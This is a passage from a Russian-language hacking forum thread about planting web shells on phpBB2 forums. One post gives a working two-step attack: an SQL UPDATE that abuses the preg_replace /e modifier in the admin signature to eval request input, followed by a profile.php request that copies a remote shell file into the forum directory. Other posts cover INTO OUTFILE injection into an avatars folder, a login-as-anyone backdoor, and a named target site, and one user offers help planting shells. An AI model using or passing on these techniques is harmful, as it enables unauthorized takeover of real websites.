Форумы заливка shell - phpbb2

Discussion in 'Уязвимости CMS/форумов' started by number0, 17 Apr 2008.

  1. number0

    number0 Banned

    Joined:
    1 Mar 2008
    Messages:
    27
    Likes Received:
    5
    Reputations:
    0
    Посмотрел логи апача... логи молчат. никаких соденений не устанавливалось на отдачу файлика db.txt
     
  2. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    А что делать если profile.php просто нету?
     
  3. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    417
    Likes Received:
    32
    Reputations:
    1
    Схожая проблема, только чуть сложнее
    2.0.21 чистый (без модов).
    Админка есть
    нулевой байт экранируется
    мускуль-иньекция в скрипте ЦМС (не пхпбб)
    чкрез восстановление БД - то же не получится, форум криво настроен, что нельзя сделать декап БД :( (оказалось что иногда криворукость помогает))))
    Не пойму другого:
    стараюсь делать через иньекцию INTO OUTFILE в */avatars/shel.php через CHAR или через 0x
    Сервер мне только выдает строку в странице ту что после select но в файл не выводит
    LOAD_FILE - вообще ни чего не выводит, но это я понял на всех хостингах, на моем тоже не выводит при чистом запросе из мускуль клиента.
    Можно что то еще сделать по этим признакам?
    спасибо
    ЗЫ
    Все работает!! Это я про експлоит Шанкара, рано разочаровался, то экранировало нул. байт в запросе SQL а через эксплойт все прошло! Вери гуд! :)
     
    #23 tmp, 19 May 2008
    Last edited: 22 May 2008
  4. DiegoSun

    DiegoSun New Member

    Joined:
    6 Dec 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Не могу найти тему. Если кто помнит подскажите. Как сохранить возможность в phpbb заходить под любым логином. Там надо было добавить код при авторизации (был нужен доступ по ftp)
     
  5. $cr1pt

    $cr1pt New Member

    Joined:
    25 Feb 2010
    Messages:
    11
    Likes Received:
    2
    Reputations:
    1
    проще всего залить шелл:
    создаем 1.sql cо следующим содержанием:
    UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_REQUEST[c]));' WHERE user_id=2;

    далее:
    profile.php?mode=editprofile&c=copy('http://127.0.0.1/shell.txt','/home/home/public_html/forum/shell.php');

    Всё готово ;)
     
    #25 $cr1pt, 11 Apr 2010
    Last edited: 11 Apr 2010
    1 person likes this.
  6. Spunoff

    Spunoff New Member

    Joined:
    16 Jan 2012
    Messages:
    40
    Likes Received:
    1
    Reputations:
    0
    Спасибо, залился.
    Всё перепробовал что только можно, а сделал как тут указано и всё ок.
    П.С поэтому апнул тему...
     
  7. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Добавляю сигнатуру, захожу в профиль и вижу

    код, есесно, не выполняется.


    посмотрел соурсы движка

    PHP:
     $signature = ($this_userdata['user_sig_bbcode_uid'] != '') ? preg_replace('#:' $this_userdata['user_sig_bbcode_uid'] . '#si'''$this_userdata['user_sig']) : $this_userdata['user_sig'];
     
    $signature preg_replace($html_entities_match$html_entities_replace$signature);
    Видно, что регулярка идет не через "/", а через "#"

    заменил (.+)/e на (.+)#e - ошибка исчезла, но код не выполняется.
     
    #27 попугай, 3 May 2012
    Last edited: 3 May 2012
  8. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Обычно это прокатывало, на встретил форум, когда при заходе в профиль висит надпись,
    код не выполняется ((
    Случ, не знаете другой способ? (file_priv N, аву не заинклудить нету прав на заливку файлов и аватаров)
     
  9. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    сессию в гете нужно держать. Сайт случаем, не http://b******oi.ru?
     
  10. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    да)

    ну тогда спортивный вопрос, как сессию держать в гете?

    не хочешь не надо) но я его всё равно добью.
     
    #30 OxoTnik, 4 May 2012
    Last edited: 4 May 2012
    1 person likes this.
  11. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    когда заходишь на профиль сессия в параметре GET передается

    profile.php?u=2&c=md5_hash_of_session ее убирать не нужно
     
    1 person likes this.
  12. Lasteeck

    Lasteeck *ersguterjunge*

    Joined:
    5 Apr 2010
    Messages:
    172
    Likes Received:
    109
    Reputations:
    6
    Помогу влить шелл через этот способ, стучи в ЛС.